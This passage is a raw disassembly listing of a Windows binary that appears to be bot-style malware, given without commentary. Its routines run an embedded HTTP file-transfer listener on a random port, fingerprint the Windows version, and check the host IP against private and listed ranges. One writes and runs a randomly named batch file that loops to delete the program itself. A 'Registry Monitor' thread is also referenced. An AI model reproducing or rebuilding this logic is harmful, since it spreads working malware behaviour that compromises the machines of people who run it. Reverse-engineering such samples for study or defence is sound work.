jnz short loc_41896A
sub eax, esi
mov [ebp+eax+0CA8h+var_508], bl
lea eax, [ebp+0CA8h+var_508]
lea esi, [eax+1]
loc_418983: ; CODE XREF: sub_418552+436�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_418983
sub eax, esi
mov esi, ds:dword_41D228
push ebx
push eax
lea eax, [ebp+0CA8h+var_508]
push eax
push [ebp+0CA8h+arg_0]
call esi
test eax, eax
jz loc_418ABE
push ebx
push [ebp+0CA8h+var_D1C]
push [ebp+0CA8h+var_D20]
push [ebp+0CA8h+arg_0]
call esi
test eax, eax
jz loc_418ABE
lea eax, [ebp+0CA8h+var_108]
push eax
push offset byte_4267B0
call sub_4028A9
test eax, eax
pop ecx
pop ecx
jnz loc_418ABE
push 100h
call sub_402648
mov esi, eax
push esi
call sub_402A45
push eax
mov ebx, offset dword_424ED0
call sub_4196D1
xor eax, eax
lea edi, [ebp+0CA8h+var_D18]
stosd
stosd
stosd
add esp, 0Ch
stosd
lea eax, [ebp+0CA8h+var_D24]
push eax
lea eax, [ebp+0CA8h+var_D18]
push eax
push [ebp+0CA8h+arg_0]
mov [ebp+0CA8h+var_D24], 10h
call ds:dword_41D248
movzx eax, [ebp+0CA8h+var_D11]
movzx ecx, [ebp+0CA8h+var_D12]
shl eax, 8
add eax, ecx
movzx ecx, [ebp+0CA8h+var_D13]
shl eax, 8
add eax, ecx
movzx ecx, [ebp+0CA8h+var_D14]
shl eax, 8
add eax, ecx
push 2
mov [ebp+0CA8h+var_D1C], eax
push 4
lea eax, [ebp+0CA8h+var_D1C]
push eax
call ds:dword_41D280
test eax, eax
push ds:dword_433940
jnz short loc_418A86
movzx eax, [ebp+0CA8h+var_D11]
push eax
movzx eax, [ebp+0CA8h+var_D12]
push eax
movzx eax, [ebp+0CA8h+var_D13]
push eax
movzx eax, [ebp+0CA8h+var_D14]
push eax
push offset aHttpTransferD_ ; "HTTP: Transfer: %d.%d.%d.%d (N/A). %d T"...
push esi
push 0
push offset dword_4269BC
call sub_417361
add esp, 24h
jmp short loc_418AB1
; ---------------------------------------------------------------------------
loc_418A86: ; CODE XREF: sub_418552+507�j
push dword ptr [eax]
movzx eax, [ebp+0CA8h+var_D11]
push eax
movzx eax, [ebp+0CA8h+var_D12]
push eax
movzx eax, [ebp+0CA8h+var_D13]
push eax
movzx eax, [ebp+0CA8h+var_D14]
push eax
push offset aHttpTransfer_0 ; "HTTP: Transfer: %d.%d.%d.%d (%s). %d To"...
push esi
push 0
push offset dword_4269BC
call sub_417361
add esp, 28h
loc_418AB1: ; CODE XREF: sub_418552+532�j
inc ds:dword_433940
push esi
call sub_402B9B
pop ecx
loc_418ABE: ; CODE XREF: sub_418552+453�j
; sub_418552+46A�j ...
push [ebp+0CA8h+var_D20]
call sub_403603
pop ecx
loc_418AC7: ; CODE XREF: sub_418552+189�j
push [ebp+0CA8h+arg_0]
call ds:dword_41D224
loc_418AD3: ; CODE XREF: sub_418552+19A�j
pop edi
loc_418AD4: ; CODE XREF: sub_418552+AB�j
mov ecx, [ebp+0CA8h+var_4]
pop esi
xor ecx, ebp
pop ebx
call sub_402710
add ebp, 0CA8h
leave
retn
sub_418552 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418AEB proc near ; DATA XREF: sub_418C40+27�o
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 401h
jz short loc_418AFE
pop ebp
jmp ds:dword_41D200
; ---------------------------------------------------------------------------
loc_418AFE: ; CODE XREF: sub_418AEB+A�j
mov eax, [ebp+arg_C]
dec eax
jz short loc_418B10
sub eax, 7
jnz short loc_418B19
call sub_41835D
jmp short loc_418B19
; ---------------------------------------------------------------------------
loc_418B10: ; CODE XREF: sub_418AEB+17�j
push [ebp+arg_8]
call sub_418552
pop ecx
loc_418B19: ; CODE XREF: sub_418AEB+1C�j
; sub_418AEB+23�j
xor eax, eax
pop ebp
retn 10h
sub_418AEB endp
; =============== S U B R O U T I N E =======================================
sub_418B1F proc near ; CODE XREF: sub_418C40+9B�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
mov edi, 104h
push edi
xor ebp, ebp
push ebp
mov ebx, offset dword_4266A8
push ebx
call sub_407B70
push edi
push ebp
mov esi, offset dword_4268B8
push esi
call sub_407B70
push edi
push ebp
mov ebp, offset byte_4267B0
push ebp
call sub_407B70
add esp, 24h
push edi
push ebx
call ds:dword_41D0F4
push edi
mov ebx, offset byte_425061
call sub_4196D1
push esi
push offset dword_4266A8
push offset aSS_10 ; "%s\\%s"
push 103h
push ebp
call sub_402AEE
mov eax, ebp
add esp, 18h
lea ecx, [eax+1]
loc_418B85: ; CODE XREF: sub_418B1F+6B�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_418B85
push 0
push 1
sub eax, ecx
push 2
mov ds:byte_4267B0[eax], dl
call ds:dword_41D27C
cmp eax, 0FFFFFFFFh
mov ds:dword_4267AC, eax
jnz short loc_418BB8
push eax
loc_418BAB: ; CODE XREF: sub_418B1F+E7�j
call ds:dword_41D224
xor eax, eax
jmp loc_418C3B
; ---------------------------------------------------------------------------
loc_418BB8: ; CODE XREF: sub_418B1F+89�j
mov eax, 0FFDCh
mov ebx, 3E8h
call sub_4192C7
push eax
mov ds:dword_426594, eax
mov ds:word_426694, 2
call ds:dword_41D278
and ds:dword_426698, 0
push 10h
push offset word_426694
push ds:dword_4267AC
mov ds:word_426696, ax
call ds:dword_41D26C
test eax, eax
jz short loc_418C08
loc_418C00: ; CODE XREF: sub_418B1F+102�j
; sub_418B1F+114�j
push ds:dword_4267AC
jmp short loc_418BAB
; ---------------------------------------------------------------------------
loc_418C08: ; CODE XREF: sub_418B1F+DF�j
push 9
push 401h
push [esp+18h+arg_0]
push ds:dword_4267AC
call ds:dword_41D22C
test eax, eax
jnz short loc_418C00
push 4
push ds:dword_4267AC
call ds:dword_41D230
test eax, eax
jnz short loc_418C00
inc eax
mov ds:byte_4268B4, al
loc_418C3B: ; CODE XREF: sub_418B1F+94�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_418B1F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418C40 proc near ; DATA XREF: sub_418D17+21�o
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 50h
mov eax, ds:dword_4266A4
push ebx
mov ebx, ds:dword_41D1F4
push esi
push edi
mov edi, 7F00h
push edi
xor esi, esi
push esi
mov [ebp+var_3C], eax
mov [ebp+var_28], offset dword_4255BC
mov [ebp+var_48], offset sub_418AEB
mov [ebp+var_4C], 8
mov [ebp+var_50], 30h
call ebx
push edi
push esi
mov [ebp+var_38], eax
call ebx
push edi
push esi
mov [ebp+var_24], eax
call ds:dword_41D20C
mov [ebp+var_34], eax
lea eax, [ebp+var_50]
push eax
mov [ebp+var_2C], esi
mov [ebp+var_44], esi
mov [ebp+var_40], esi
mov [ebp+var_30], 1
call ds:dword_41D1F0
test ax, ax
jz short loc_418D0E
push esi
push ds:dword_4266A4
mov eax, 80000000h
push esi
push esi
push esi
push esi
push eax
push eax
push 0CF0000h
push offset asc_420364 ; " "
push offset dword_4255BC
push esi
call ds:dword_41D1FC
push eax
call sub_418B1F
test eax, eax
pop ecx
jz short loc_418D0E
mov edi, ds:dword_41D208
jmp short loc_418D01
; ---------------------------------------------------------------------------
loc_418CED: ; CODE XREF: sub_418C40+CC�j
lea eax, [ebp+var_20]
push eax
call ds:dword_41D1F8
lea eax, [ebp+var_20]
push eax
call ds:dword_41D204
loc_418D01: ; CODE XREF: sub_418C40+AB�j
push esi
push esi
push esi
lea eax, [ebp+var_20]
push eax
call edi
test eax, eax
jnz short loc_418CED
loc_418D0E: ; CODE XREF: sub_418C40+70�j
; sub_418C40+A3�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_418C40 endp
; =============== S U B R O U T I N E =======================================
sub_418D17 proc near ; CODE XREF: sub_401F1C+70�p
; seg000:0041BFC8�p
push 4
mov eax, offset loc_41C299
call sub_4045CC
push 8
call sub_40304B
mov esi, eax
pop ecx
mov [ebp-10h], esi
and dword ptr [ebp-4], 0
test esi, esi
jz short loc_418D4B
push offset sub_418C40
xor ecx, ecx
mov edi, offset aHs ; "HS"
call sub_4140AB
jmp short loc_418D4D
; ---------------------------------------------------------------------------
loc_418D4B: ; CODE XREF: sub_418D17+1F�j
xor eax, eax
loc_418D4D: ; CODE XREF: sub_418D17+32�j
cmp dword ptr [eax+4], 0
setnz al
call sub_40466B
retn
sub_418D17 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_418D5A proc near ; CODE XREF: sub_4192C7:loc_4192EB�p
mov eax, ds:dword_4265B0
mov edx, ds:dword_4265B4
lea ecx, ds:4265B8h[eax*4]
push esi
mov esi, eax
mov eax, ds:dword_4265B8[edx*4]
add eax, [ecx]
and eax, 3FFFFFFFh
inc esi
cmp esi, 37h
mov [ecx], eax
jnz short loc_418D87
xor esi, esi
loc_418D87: ; CODE XREF: sub_418D5A+29�j
inc edx
cmp edx, 37h
jnz short loc_418D8F
xor edx, edx
loc_418D8F: ; CODE XREF: sub_418D5A+31�j
mov ds:dword_4265B0, esi
mov ds:dword_4265B4, edx
sar eax, 6
pop esi
retn
sub_418D5A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418DA0 proc near ; CODE XREF: sub_401CC0+125�p
; sub_41748B:loc_41759C�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 14h
push ebx
lea eax, [ebp+var_10]
push eax
call ds:dword_41D058
test eax, eax
jz short loc_418E1C
lea eax, [ebp+var_8]
push eax
call ds:dword_41D064
test eax, eax
jz short loc_418E1C
push [ebp+var_4]
push [ebp+var_8]
push [ebp+var_C]
push [ebp+var_10]
call sub_41C070
push 0
push 15180h
push edx
push eax
call sub_411800
push 0
push 0E10h
push ebx
push ecx
mov ds:dword_426598, eax
mov ds:dword_42659C, edx
call sub_411800
push 0
push 3Ch
push ebx
push ecx
mov ds:dword_4265A0, eax
mov ds:dword_4265A4, edx
call sub_41C070
mov ds:dword_4265A8, eax
mov ds:dword_4265AC, edx
loc_418E1C: ; CODE XREF: sub_418DA0+13�j
; sub_418DA0+21�j
pop ebx
leave
retn
sub_418DA0 endp
; =============== S U B R O U T I N E =======================================
sub_418E1F proc near ; CODE XREF: sub_401CC0+EF�p
; sub_41748B+BC�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push [esp+arg_0]
push 0
push esi
call sub_407B70
add esp, 0Ch
cmp [esp+arg_4], 0
push [esp+arg_0]
push esi
jz short loc_418E41
push 1002h
jmp short loc_418E43
; ---------------------------------------------------------------------------
loc_418E41: ; CODE XREF: sub_418E1F+19�j
push 7
loc_418E43: ; CODE XREF: sub_418E1F+20�j
push 800h
call ds:dword_41D054
mov eax, esi
retn
sub_418E1F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_418E51 proc near ; CODE XREF: sub_401CC0+DA�p
; sub_41748B+8B�p ...
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = byte ptr -84h
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 98h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+74h+var_4], eax
push ebx
push edi
lea eax, [ebp+74h+var_98]
push eax
mov ebx, ecx
mov [ebp+74h+var_98], 94h
call ds:dword_41D068
push ebx
xor edi, edi
push edi
push esi
call sub_407B70
add esp, 0Ch
cmp [ebp+74h+var_94], 6
jnz short loc_418E9A
cmp [ebp+74h+var_90], edi
jnz short loc_418F05
push offset aVis ; "VIS"
jmp short loc_418F0A
; ---------------------------------------------------------------------------
loc_418E9A: ; CODE XREF: sub_418E51+3B�j
cmp [ebp+74h+var_94], 5
jnz short loc_418EC6
cmp [ebp+74h+var_90], 2
jnz short loc_418EAD
push offset a2k3 ; "2K3"
jmp short loc_418F0A
; ---------------------------------------------------------------------------
loc_418EAD: ; CODE XREF: sub_418E51+53�j
cmp [ebp+74h+var_90], 1
jnz short loc_418EBA
push offset aXp_0 ; "XP"
jmp short loc_418F0A
; ---------------------------------------------------------------------------
loc_418EBA: ; CODE XREF: sub_418E51+60�j
cmp [ebp+74h+var_90], edi
jnz short loc_418F05
push offset a2k ; "2K"
jmp short loc_418F0A
; ---------------------------------------------------------------------------
loc_418EC6: ; CODE XREF: sub_418E51+4D�j
cmp [ebp+74h+var_94], 4
jnz short loc_418F05
cmp [ebp+74h+var_90], 5Ah
jnz short loc_418ED9
push offset aMe ; "ME"
jmp short loc_418F0A
; ---------------------------------------------------------------------------
loc_418ED9: ; CODE XREF: sub_418E51+7F�j
cmp [ebp+74h+var_90], 1
jnz short loc_418EE6
push offset a98 ; "98"
jmp short loc_418F0A
; ---------------------------------------------------------------------------
loc_418EE6: ; CODE XREF: sub_418E51+8C�j
cmp [ebp+74h+var_90], edi
jnz short loc_418F05
cmp [ebp+74h+var_88], 2
jnz short loc_418EF8
push offset aNt ; "NT"
jmp short loc_418F0A
; ---------------------------------------------------------------------------
loc_418EF8: ; CODE XREF: sub_418E51+9E�j
cmp [ebp+74h+var_88], 1
jnz short loc_418F17
push offset a95 ; "95"
jmp short loc_418F0A
; ---------------------------------------------------------------------------
loc_418F05: ; CODE XREF: sub_418E51+40�j
; sub_418E51+6C�j ...
push offset aUnk ; "UNK"
loc_418F0A: ; CODE XREF: sub_418E51+47�j
; sub_418E51+5A�j ...
lea eax, [ebx-1]
push eax
push esi
call sub_402AEE
add esp, 0Ch
loc_418F17: ; CODE XREF: sub_418E51+AB�j
mov eax, esi
lea edx, [eax+1]
loc_418F1C: ; CODE XREF: sub_418E51+D0�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_418F1C
sub eax, edx
cmp [ebp+74h+arg_0], cl
mov [eax+esi], cl
jz loc_418FB3
push ebx
call sub_402648
mov edi, eax
push edi
call sub_402A45
push eax
push 0
push edi
call sub_407B70
add esp, 14h
push [ebp+74h+var_8C]
lea eax, [ebp+74h+var_84]
push [ebp+74h+var_90]
push [ebp+74h+var_94]
push eax
push esi
push offset aOsMicrosoftWin ; "[OS: Microsoft Windows %s %s (%i.%i bui"...
push edi
call sub_402A45
pop ecx
dec eax
push eax
push edi
call sub_402AEE
mov eax, edi
add esp, 20h
lea ecx, [eax+1]
loc_418F75: ; CODE XREF: sub_418E51+129�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_418F75
push ebx
sub eax, ecx
push 0
push esi
mov [eax+edi], dl
call sub_407B70
push edi
push offset aS_5 ; "%s"
dec ebx
push ebx
push esi
call sub_402AEE
mov eax, esi
add esp, 1Ch
lea ecx, [eax+1]
loc_418FA0: ; CODE XREF: sub_418E51+154�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_418FA0
sub eax, ecx
push edi
mov [eax+esi], dl
call sub_402B9B
pop ecx
loc_418FB3: ; CODE XREF: sub_418E51+DA�j
mov ecx, [ebp+74h+var_4]
pop edi
xor ecx, ebp
mov eax, esi
pop ebx
call sub_402710
add ebp, 74h
leave
retn
sub_418E51 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418FC6 proc near ; CODE XREF: sub_401C1D+50�p
; sub_401CC0+FE�p ...
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_8], eax
push edi
xor eax, eax
lea edi, [ebp+var_18]
stosd
stosd
stosd
stosd
xor eax, eax
mov edi, esi
stosd
stosd
stosd
stosd
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_18]
push eax
push [ebp+arg_0]
mov [ebp+var_1C], 10h
call ds:dword_41D238
movzx eax, [ebp+var_11]
push eax
movzx eax, [ebp+var_12]
push eax
movzx eax, [ebp+var_13]
push eax
movzx eax, [ebp+var_14]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
push 0Fh
push esi
call sub_402AEE
mov eax, esi
add esp, 1Ch
lea ecx, [eax+1]
loc_419029: ; CODE XREF: sub_418FC6+68�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_419029
sub eax, ecx
mov ecx, [ebp+var_8]
mov [eax+esi], dl
xor ecx, ebp
mov eax, esi
pop edi
call sub_402710
leave
retn
sub_418FC6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419044 proc near ; CODE XREF: sub_401F1C+10C�p
; sub_417676+A5�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push esi
mov esi, ecx
mov cl, [eax]
test cl, cl
push edi
jz short loc_4190AD
loc_419052: ; CODE XREF: sub_419044+24�j
mov dl, [esi]
cmp dl, 2Ah
jz short loc_41906A
cmp dl, cl
jz short loc_419062
cmp dl, 3Fh
jnz short loc_419088
loc_419062: ; CODE XREF: sub_419044+17�j
inc esi
inc eax
mov cl, [eax]
test cl, cl
jnz short loc_419052
loc_41906A: ; CODE XREF: sub_419044+13�j
mov cl, [eax]
test cl, cl
jz short loc_4190AD
mov edi, [ebp+var_4]
loc_419073: ; CODE XREF: sub_419044+5F�j
mov dl, [esi]
cmp dl, 2Ah
jnz short loc_41908C
inc esi
cmp byte ptr [esi], 0
jz short loc_4190A7
mov [ebp+var_4], esi
lea edi, [eax+1]
jmp short loc_41909F
; ---------------------------------------------------------------------------
loc_419088: ; CODE XREF: sub_419044+1C�j
xor eax, eax
jmp short loc_4190B9
; ---------------------------------------------------------------------------
loc_41908C: ; CODE XREF: sub_419044+34�j
cmp dl, cl
jz short loc_41909D
cmp dl, 3Fh
jz short loc_41909D
mov esi, [ebp+var_4]
mov eax, edi
inc edi
jmp short loc_41909F
; ---------------------------------------------------------------------------
loc_41909D: ; CODE XREF: sub_419044+4A�j
; sub_419044+4F�j
inc esi
inc eax
loc_41909F: ; CODE XREF: sub_419044+42�j
; sub_419044+57�j
mov cl, [eax]
test cl, cl
jnz short loc_419073
jmp short loc_4190AD
; ---------------------------------------------------------------------------
loc_4190A7: ; CODE XREF: sub_419044+3A�j
xor eax, eax
inc eax
jmp short loc_4190B9
; ---------------------------------------------------------------------------
loc_4190AC: ; CODE XREF: sub_419044+6C�j
inc esi
loc_4190AD: ; CODE XREF: sub_419044+C�j
; sub_419044+2A�j ...
cmp byte ptr [esi], 2Ah
jz short loc_4190AC
xor eax, eax
cmp [esi], al
setz al
loc_4190B9: ; CODE XREF: sub_419044+46�j
; sub_419044+66�j
pop edi
pop esi
leave
retn
sub_419044 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4190BD proc near ; CODE XREF: sub_419477+14A�p
var_23C = byte ptr -23Ch
var_23B = byte ptr -23Bh
var_13C = byte ptr -13Ch
var_13B = byte ptr -13Bh
var_3C = byte ptr -3Ch
var_3B = byte ptr -3Bh
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 23Ch
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push esi
xor ebx, ebx
push 37h
lea eax, [ebp+var_3B]
push ebx
push eax
mov [ebp+var_3C], bl
call sub_407B70
mov esi, 0FFh
push esi
lea eax, [ebp+var_23B]
push ebx
push eax
mov [ebp+var_23C], bl
call sub_407B70
push esi
lea eax, [ebp+var_13B]
push ebx
push eax
mov [ebp+var_13C], bl
call sub_407B70
add esp, 24h
push 100h
lea eax, [ebp+var_13C]
push eax
push ebx
call ds:dword_41D0E4
push eax
call ds:dword_41D060
lea eax, [ebp+var_13C]
push eax
push eax
lea eax, [ebp+var_23C]
push offset a@echoOff1DelSI ; "@echo off\r\n:1\r\ndel \"%s\"\r\nif exist \"%s\" "...
push eax
call sub_4030B5
push 104h
call sub_402648
mov esi, eax
push esi
call sub_402A45
add esp, 18h
dec eax
push eax
push esi
call ds:dword_41D0F4
call sub_403363
push 18h
cdq
pop ecx
idiv ecx
add edx, 61h
push edx
call sub_403363
push 18h
cdq
pop ecx
idiv ecx
add edx, 61h
push edx
call sub_403363
push 18h
cdq
pop ecx
idiv ecx
add edx, 61h
push edx
call sub_403363
push 0Ah
cdq
pop ecx
idiv ecx
push edx
call sub_403363
push 0Ah
cdq
pop ecx
idiv ecx
push edx
call sub_403363
push 0Ah
pop ecx
cdq
idiv ecx
lea eax, [ebp+var_3C]
push edx
push esi
push offset aSTmpIIICCC_bat ; "%s\\tmp-%i%i%i-%c%c%c.bat"
push eax
call sub_4030B5
push esi
call sub_402B9B
lea eax, [ebp+var_3C]
push offset aW ; "w"
push eax
call sub_4031F4
mov esi, eax
add esp, 30h
cmp esi, ebx
jz short loc_41920B
lea eax, [ebp+var_23C]
push eax
push offset aS_6 ; "%s"
push esi
call sub_403207
push esi
call sub_4034C4
add esp, 10h
push ebx
push ebx
push ebx
lea eax, [ebp+var_3C]
push eax
push ebx
push ebx
call ds:dword_41D1E4
loc_41920B: ; CODE XREF: sub_4190BD+122�j
mov ecx, [ebp+var_4]
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_4190BD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419219 proc near ; CODE XREF: seg000:0041BABE�p
; seg000:0041BDC4�p
var_16C = dword ptr -16Ch
var_168 = byte ptr -168h
var_124 = dword ptr -124h
var_120 = byte ptr -120h
var_114 = byte ptr -114h
var_113 = byte ptr -113h
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 170h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_8], eax
push ebx
push esi
push edi
xor ebx, ebx
push 40h
lea eax, [ebp+var_168]
push ebx
push eax
mov [ebp+var_16C], ebx
call sub_407B70
xor eax, eax
mov [ebp+var_124], ebx
lea edi, [ebp+var_120]
stosd
stosd
mov esi, 103h
push esi
stosd
lea eax, [ebp+var_113]
push ebx
push eax
mov [ebp+var_114], bl
call sub_407B70
lea eax, [ebp+arg_4]
push eax
push [ebp+arg_0]
lea eax, [ebp+var_114]
push esi
push eax
call sub_403436
add esp, 28h
lea eax, [ebp+var_124]
push eax
lea eax, [ebp+var_16C]
push eax
push ebx
push ebx
push 28h
push ebx
push ebx
push ebx
lea eax, [ebp+var_114]
push eax
push ebx
call ds:dword_41D05C
mov ecx, [ebp+var_8]
test eax, eax
pop edi
setnz al
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_419219 endp
; ---------------------------------------------------------------------------
push 0
call sub_403540
pop ecx
retn
; =============== S U B R O U T I N E =======================================
sub_4192C7 proc near ; CODE XREF: seg000:00413AAE�p
; seg000:00413AC1�p ...
push esi
mov esi, eax
xor eax, eax
inc eax
sub eax, ebx
add esi, eax
cmp esi, 1
jg short loc_4192DA
mov eax, ebx
pop esi
retn
; ---------------------------------------------------------------------------
loc_4192DA: ; CODE XREF: sub_4192C7+D�j
push 2
pop eax
cmp esi, eax
jle short loc_4192E7
loc_4192E1: ; CODE XREF: sub_4192C7+1E�j
add eax, eax
cmp eax, esi
jl short loc_4192E1
loc_4192E7: ; CODE XREF: sub_4192C7+18�j
push edi
lea edi, [eax-1]
loc_4192EB: ; CODE XREF: sub_4192C7+2D�j
call sub_418D5A
and eax, edi
cmp eax, esi
jge short loc_4192EB
pop edi
add eax, ebx
pop esi
retn
sub_4192C7 endp
; =============== S U B R O U T I N E =======================================
sub_4192FB proc near ; CODE XREF: sub_401F1C+420�p
; seg000:loc_413F5D�p ...
and ds:dword_4265B0, 0
push 0
mov ds:dword_4265B4, 1Fh
call sub_403540
mov edx, 3FFFFFFFh
and eax, edx
pop ecx
mov ds:dword_4265B8, eax
mov ds:dword_4265BC, 1
mov eax, offset dword_4265B8
push esi
loc_419330: ; CODE XREF: sub_4192FB+48�j
lea ecx, [eax+4]
mov esi, [ecx]
add esi, [eax]
and esi, edx
mov [eax+8], esi
mov eax, ecx
cmp eax, offset dword_42668C
jl short loc_419330
pop esi
retn
sub_4192FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419347 proc near ; CODE XREF: sub_41748B+E6�p
; sub_41A5C1+B6�p ...
var_24 = byte ptr -24h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 24h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push esi
push edi
push ds:dword_4269BC
mov [ebp+var_14], 0
xor eax, eax
lea edi, [ebp+var_13]
stosd
stosd
stosd
stosw
lea esi, [ebp+var_14]
stosb
call sub_418FC6
pop ecx
mov eax, esi
mov ecx, offset a192_168__ ; "192.168.*.*"
call sub_419044
test eax, eax
jnz loc_419467
mov eax, esi
mov ecx, offset a10___ ; "10.*.*.*"
call sub_419044
test eax, eax
jnz loc_419467
mov eax, esi
mov ecx, offset a111___ ; "111.*.*.*"
call sub_419044
test eax, eax
jnz loc_419467
mov eax, esi
mov ecx, offset a15___ ; "15.*.*.*"
call sub_419044
test eax, eax
jnz loc_419467
mov eax, esi
mov ecx, offset a16___ ; "16.*.*.*"
call sub_419044
test eax, eax
jnz loc_419467
mov eax, esi
mov ecx, offset a101___ ; "101.*.*.*"
call sub_419044
test eax, eax
jnz short loc_419467
mov eax, esi
mov ecx, offset a110___ ; "110.*.*.*"
call sub_419044
test eax, eax
jnz short loc_419467
mov eax, esi
mov ecx, offset a112___ ; "112.*.*.*"
call sub_419044
test eax, eax
jnz short loc_419467
mov eax, esi
mov ecx, offset a170_65__ ; "170.65.*.*"
call sub_419044
test eax, eax
jnz short loc_419467
push 10h
pop esi
loc_41941E: ; CODE XREF: sub_419347+11A�j
xor eax, eax
lea edi, [ebp+var_24]
stosd
stosd
stosd
push esi
push offset a172_D__ ; "172.%d.*.*"
stosd
lea eax, [ebp+var_24]
push 0Fh
push eax
call sub_402AEE
lea eax, [ebp+var_24]
add esp, 10h
lea edx, [eax+1]
loc_419441: ; CODE XREF: sub_419347+FF�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_419441
sub eax, edx
mov [ebp+eax+var_24], cl
lea eax, [ebp+var_14]
lea ecx, [ebp+var_24]
call sub_419044
test eax, eax
jnz short loc_419467
inc esi
cmp esi, 1Fh
jbe short loc_41941E
xor al, al
jmp short loc_419469
; ---------------------------------------------------------------------------
loc_419467: ; CODE XREF: sub_419347+3E�j
; sub_419347+52�j ...
mov al, 1
loc_419469: ; CODE XREF: sub_419347+11E�j
mov ecx, [ebp+var_4]
pop edi
xor ecx, ebp
pop esi
call sub_402710
leave
retn
sub_419347 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419477 proc near ; CODE XREF: seg000:0041BAEA�p
; seg000:0041C066�p
var_2A8 = byte ptr -2A8h
var_2A0 = dword ptr -2A0h
var_29C = dword ptr -29Ch
var_298 = dword ptr -298h
var_294 = dword ptr -294h
var_290 = dword ptr -290h
var_28C = byte ptr -28Ch
var_28B = byte ptr -28Bh
var_1CC = byte ptr -1CCh
var_1CB = byte ptr -1CBh
var_CC = byte ptr -0CCh
var_CB = byte ptr -0CBh
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2A8h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, 0BFh
xor ebx, ebx
push esi
mov [ebp+var_298], eax
lea eax, [ebp+var_CB]
push ebx
push eax
mov [ebp+var_CC], bl
call sub_407B70
add esp, 0Ch
push esi
lea eax, [ebp+var_28B]
push ebx
push eax
mov [ebp+var_28C], bl
call sub_407B70
add esp, 0Ch
push ebx
lea edi, [ebp+var_CC]
call sub_41B7F9
pop ecx
inc esi
push esi
mov eax, edi
push ebx
push eax
call sub_407B70
add esp, 0Ch
push esi
lea eax, [ebp+var_28C]
push ebx
push eax
call sub_407B70
add esp, 0Ch
push 0FFh
lea eax, [ebp+var_1CB]
push ebx
push eax
mov [ebp+var_1CC], bl
call sub_407B70
mov eax, ds:dword_433C4C
mov eax, [eax]
mov [ebp+var_290], eax
mov eax, offset dword_433C48
add esp, 0Ch
mov [ebp+var_294], eax
mov [ebp+var_2A0], eax
loc_419530: ; CODE XREF: sub_419477+102�j
mov eax, ds:dword_433C4C
lea edi, [ebp+var_2A0]
lea esi, [ebp+var_294]
mov [ebp+var_29C], eax
call sub_40166F
test al, al
jz short loc_419587
mov edi, offset aRegistryMonito ; "Registry Monitor"
call sub_40164F
mov esi, eax
add esi, 5
push 11h
pop ecx
xor eax, eax
repe cmpsb
lea esi, [ebp+var_294]
jz short loc_41957B
lea edi, [ebp+var_2A8]
call sub_40168C
jmp short loc_419530
; ---------------------------------------------------------------------------
loc_41957B: ; CODE XREF: sub_419477+F5�j
call sub_40164F
mov eax, [eax]
call sub_414023
loc_419587: ; CODE XREF: sub_419477+D7�j
mov edi, 100h
push edi
